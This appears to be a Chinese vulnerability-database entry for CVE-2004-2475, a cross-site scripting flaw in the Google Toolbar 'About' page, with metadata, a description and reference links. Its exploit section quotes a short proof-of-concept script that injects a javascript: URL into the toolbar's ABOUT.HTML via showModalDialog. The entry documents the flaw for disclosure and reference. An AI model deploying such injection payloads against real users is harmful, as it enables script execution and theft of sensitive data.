Google工具栏’About’跨站脚本执行漏洞

Google工具栏’About’跨站脚本执行漏洞

漏洞ID 1108177 漏洞类型 输入验证
发布时间 2004-09-17 更新时间 2005-10-20
图片[1]-Google工具栏’About’跨站脚本执行漏洞-安全小百科CVE编号 CVE-2004-2475
图片[2]-Google工具栏’About’跨站脚本执行漏洞-安全小百科CNNVD-ID CNNVD-200412-1194
漏洞平台 Windows CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/24607
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-1194
|漏洞详情
GoogleToolbar是集成于IE的工具条,方便用户搜索。GoogleToolbar存在一个输入验证问题,远程攻击者可以利用这个漏洞进行跨站脚本攻击,获得用户敏感信息。工具栏的’About’段不正确过滤HTML代码,用户可以建立一HTML,当被目标用户装载时,会调用’About’页面,在页面上下问执行任意脚本代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/11210/info

Google Toolbar is reported prone to a HTML injection vulnerability. It is reported that the Google Toolbar 'ABOUT.HTML' page allows the injection of HTML and JavaScript code.

This vulnerability may allow an attacker to inject malicious HTML and script code into the about page of the vulnerable application.

<s c r i p t>
window.showModalDialog("res://C:\Program%20Files\Google\GoogleToolbar1.dll/ABOUT.HTML",
"<div style="background-image:
url(javascript:alert(location.href));">");
</s c r i p t>
|参考资料

来源:XF
名称:google-toolbar-about-code-execution(17435)
链接:http://xforce.iss.net/xforce/xfdb/17435
来源:BID
名称:11210
链接:http://www.securityfocus.com/bid/11210
来源:OSVDB
名称:10037
链接:http://www.osvdb.org/10037
来源:SECTRACK
名称:1011351
链接:http://securitytracker.com/id?1011351
来源:FULLDISC
名称:20040918Re:GoogleToolbar:About–AllowsScriptInjection
链接:http://archives.neohapsis.com/archives/fulldisclosure/2004-09/0639.html
来源:FULLDISC
名称:20040918Re:GoogleToolbar:About–AllowsScriptInjection
链接:http://archives.neohapsis.com/archives/fulldisclosure/2004-09/0629.html
来源:BUGTRAQ
名称:20040917GoogleToolbar:About–AllowsScriptInjection
链接:http://archives.neohapsis.com/archives/bugtraq/2004-09/0226.html
来源:NSFOCUS
名称:6907
链接:http://www.nsfocus.net/vulndb/6907

相关推荐: Advanced Research Security Auditor Research Assistant Service Banner HTML Injection Vulnerability

Advanced Research Security Auditor Research Assistant Service Banner HTML Injection Vulnerability 漏洞ID 1099086 漏洞类型 Input Validati…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享